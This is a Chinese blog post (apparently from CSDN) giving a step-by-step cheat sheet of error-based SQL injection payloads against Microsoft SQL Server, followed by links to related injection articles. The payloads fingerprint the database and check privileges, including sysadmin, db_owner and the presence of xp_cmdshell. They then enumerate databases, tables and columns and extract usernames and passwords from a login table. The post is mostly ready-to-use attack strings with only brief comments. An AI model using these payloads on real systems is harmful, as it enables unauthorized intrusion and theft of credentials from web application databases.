Sql server注入分类之报错注入

最新推荐文章于 2023-10-18 17:04:57 发布
最新推荐文章于 2023-10-18 17:04:57 发布
阅读量357 收藏 3
点赞数
文章标签: mssql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42990434/article/details/111300952
版权

本章目录:

报错查询注入语句

  • id=8’ //报错

  • id=8 and 1=1 / and 1=2
    //1=1 页面返回正常,1=2 页面返回不正常,证明我们的语句代入进去执行了,其实这种判断可以有很多拓展

  • id=8 and exists(select * from sysobjects)
    //确实目标是否真的为mssql数据库,页面返回正常则是

  • id=8and 1=CONVERT(int,(select @@VERSION))--
    //获取当前mssql版本

  • id=8and 1=convert(int,(select @@servername))-- //获取目标机器的机器名

  • id=8and 1=CONVERT(int,(select suser_sname()))-- //获取当前的数据库用户名

  • id=8and 1=(select count(*) from master…sysobjects where xtype = ‘x’ and name = ‘xp_cmdshell’) –
    看下目标的xp_cmdshell存储过程是否还在

  • id=8and 1=CONVERT(int,(SELECT is_srvrolemember(‘sysadmin’)))--
    看下当前角色是否为数据库管理员

  • id=8and 1=convert(int,(select IS_MEMBER(‘db_owner’)))--
    /再看下当前角色是否为db_ownwer

  • id=8and 1=convert(int,(select is_srvrolemember(’public‘)))--
    //再不行的话判断是否为public权限

先统计总共有多少库

id=8 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]…[sysdatabases] )+CHAR(58)+CHAR(58)))–

//如果如上语句报错,把里面的’+’换成%2b

id=8 AND 1=CONVERT(INT,(CHAR(58)%2bCHAR(58)%2b(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]…[sysdatabases] )%2bCHAR(58)%2bCHAR(58)))–

第一步:获取库名

  • id=8 and 1=CONVERT(int,(select db_name()))--
    /获取当前数据库名

  • id=8 and 1=CONVERT(int,(select db_name(1)))--
    //第二个数据库名

第二步:获取表

  • id=8AND 1=CONVERT(INT,(CHAR(58)%2bCHAR(58)%2b(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )%2bCHAR(58)%2bCHAR(58)))--
    //事先统计下当前库中表的总个数:(如果报错,把%2b换成+)

  • id=8and 1=convert(int,(select top 1 table_name from information_schema.tables ))--
    //获取当前数据库中的所有表名,如下表示获取当前库的第一张表名

  • id=8and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in(‘photoGalary’) ))--
    //通过not in条件,把每次查出来的表名都加进去,这样就可以慢慢把所有的表都遍历出来,如下表示获取第二张表名

  • id=8and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in(‘photoGalary’,‘menu’) ))--
    //获取第三张表名

第三步:获取列名

  • id=8and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=‘login’ ))--
    //接着,获取’login’表中的所有字段名,获取的方式同上,利用not in依次遍历出所有的字段名

  • id=8 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=‘login’ and column_name not in(‘login_id’,‘username’,‘password’,‘name’) ))--
    //最后,获取的所有字段名如下:(用了不包括【not in】)

第四步:获取列数据

  • id=8 and 1=convert(int,(select top 1 username from login ))--
    //有了表名,字段名接下来的事情就很好办了,直接去查出对应字段下的数据即可获取username字段下的第一条数据

  • id=8 and 1=convert(int,(select top 1 password from login ))-
    //获取password字段下的第一条数据

扩展

假设你在当前库中并没有看到管理表,这时不妨尝试跨库查,前提是你要有权限才行

id=8 AND 1=CONVERT(INT,(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top 1 TABLE_NAME FROM riseyour_availbgur.information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC))--

玖飞
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全:SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2222
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
SQL手工注入完全篇
09-08
SQL手工注入完全篇
12-Web安全—基于SQL Server报错注入——and,conver,cast
网络安全
07-11 2281
我们知道SQL Server是由微软开发,很优秀的数据库,可以精确地定位错误消息,这点对开发人员非常友好,特别是对于web安全工作者来说,利用SQL Server报错的信息对目标系统有效进行渗透测试。 报错注入的使用场景学习MYSQL注入时已经说过,这里就不再赘述,在Less-5中输入id=1' and 1=(@@version)--+ 进行数据库报错: 数据库在执行sql语句时,会把1=(@@version)语句中括号里的内容当做int类型的数字来处理,但@@version本身是nvarch.
SQL Server 报错注入(一)
zzgslh的博客
12-25 3549
SQL Server报错注入 一、原理介绍 报错注入,顾名思义首先这里是有报错信息才可以,其次我们需要人为的制造一些错误,比如使用convert()函数进行类型转换时,如果转发失败就会报错,然后把我们要执行的SQL语句与convert()函数组合起来,报错的信息当中有咱们需要的信息。 二、函数介绍 – convert()函数介绍: convert(int,db_name()),含义是将第二个参数的值转换成第一个参数的int类型。利用mssql在转换类型的时候就出错,来爆数据库信息。 – quotename(
sqlserver命令注入和getshell
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-12 956
SqlServer基本注入需要知道的知识: 1、MSSql的系统自带数据库:master 2、在网站中,同一个网站一般不会跨库。 3、MSSql中每一个库都有一个系统自带表:sysobjects(这是系统对象表,保存当前数据库的对象) 4、注意sysobjects中的三个字段:NAME、XTYPE、ID NAME字段是表名信息;
SQL注入篇——SqlServer报错注入
爱国小白帽
02-12 3298
一、获取当前的数据库 使用函数db_name() id=1 and 1=convert(int,(select top 1 db_name())) 二、获取当前数据库的表 将获取到的数据库名与.sys.sysobjects拼接 id=1 and 1= convert(int,(select top 1 name FROM text.sys.sysobjects where xtype = 'U...
实战记录之SQL server报错手工注入
技术超强的网络安全平台
11-28 402
https://www.cnblogs.com/lxfweb/p/13067639.html 1|0前言 最近测试了一个站点,这个站点挺有意思,发现没有关闭错误提示,初步猜测是SQL server数据库,后来验证确实是。在这里记录一下实战过程,并详细讲解一下用到的知识点。 2|0SQL server报错注入原理 SQL server报错注入的文章,网上有很多,大部分文章都列出了类似于公式的句子,却没有解释为什么使用这样的函数。这里用convert()函数举例,convert()函数是是将日期转换为新数据类
SqlServer参数化查询之where in和like实现详解
12-15
身为一名小小的程序猿,在日常开发中不可以避免的要和where in和like打交道,在大多数情况下我们传的参数不多简单做下单引号、敏感字符转义之后就直接拼进了SQL,执行查询,搞定。若有一天你不可避免的需要提高SQL的...
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
最新发布
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
C#中验证sql语句是否正确(不执行语句)
12-25
SET PARSEONLY { ON | OFF }当 SET PARSEONLY 为 ON 时,SQL Server 只分析语句。当 SET PARSEONLY 为 OFF 时,SQL Server 编译并执行语句。SET PARSEONLY 的设置是在分析时设置,而不是在执行或运行时设置。在存储...
sql注入——sqlserver报错注入
cxrpty的博客
02-12 5934
注入的条件是必须有报错信息 用到函数convert(int,(select top 1 db_name() )),其含义是将第二个参数的值转换成第一个参数的int类型 一、打开文件,如下图所示,有报错信息: 二、查看数据库 输入:http://192.168.1.106/1.php?id=1 and 1=convert(int,(select top 1 db_name()));这里...
SQL注入-报错注入
LJH1999ZN的博客
02-09 9723
sql注入报错注入的演示与介绍
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
热门推荐
wangyuxiang946的博客
03-12 2万+
报错注入怎么使用,报错注入步骤,报错注入原理,报错注入使用。
sql注入(6)报错注入
c10udz的博客
05-11 4850
【web安全】——报错注入
Demo不是emo的博客
01-07 1万+
SQL注入报错注入
sql注入——报错注入
m0_73756016的博客
10-18 1234
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
深入浅出带你学习报错注入
Spontaneous_0的博客
02-19 375
深入浅出带你学习报错注入
SQL注入中的报错注入
04-05
报错注入是一种利用SQL语句执行错误返回的方式来获取数据库信息的攻击手段。攻击者通过构造恶意的SQL语句,使得数据库系统在执行时出现错误,从而获得敏感信息或者执行非法操作。 报错注入的原理是利用数据库系统在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值